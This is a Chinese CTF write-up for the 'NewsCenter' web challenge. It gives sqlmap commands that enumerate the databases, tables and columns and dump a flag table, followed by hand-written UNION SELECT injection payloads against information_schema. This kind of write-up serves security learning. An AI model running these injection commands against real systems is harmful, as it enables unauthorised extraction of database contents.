去除cnewscenter弹窗_攻防世界做题记录-NewsCenter

NewsCenter

进入界面

是一个明显的SQL注入题目

(前面的图由于先存在word再复制过来所有略微有点小糊)

f79e1b4b5b71a2328005e904083f0eb7.png

sqlmap

首先使用工具偷个懒

随意的输入一个BEACON

Burp Suite抓包

5f60c312780bc78799df4d06f6962424.png

存为TXT文件(我这里存为 NEWSCENTER.txt )

放入sqlmap目录

打开大杀器-sqlmap

查找数据库

sqlmap>python sqlmap.py -r NEWSCENTER.txt –dbs

c0294773572442dbd61d09dca2ccf9fd.png

d9ce73c8c12283ab969db2d28666ec15.png

查找表

python sqlmap.py -r NEWSCENTER.txt --tables -D news

8de30fcc826db4533aff5d19289cf627.png

4944001f143bc80e5959c4eeb5ee8566.png

查找列名

python sqlmap.py -r NEWSCENTER.txt --column -D news -T secret_table

61121018e2a5a7f81362a560d4a2523a.png

c476d2ad437248d93b85395c106bf250.png

看到了希望,读取它就🆗啦

python sqlmap.py -r NEWSCENTER.txt --dump -D news -T secret_table -C fl4g

cdd4b1e846cacab2dcdd203221144d7f.png

ab43087a3d7883d5c880ac4fa7276e45.png

纯手工

来一个基本的 'union select 1,2,3 #

提示就来了

a3fe59062b4e4c4e61ad73a3d650e2ad.png

'and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #

8b72459e98763d670c937461daf00c37.png

'and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'#

ffc38bd90b09275d458f096b271c2b6a.png

'and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#

b44a96d9c2dc004f38249e1f39f1d4d7.png

'and 0 union select 1,2,fl4g from secret_table #

bf86ddbd1aae23c521713aaa7efd37b4.png

个人对sql注入的语句还不够熟悉

手动注入的时候还是得开卷

下次整理一份sql注入语句

具体使用在资料中有网上找到的常用sql语句

资料

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值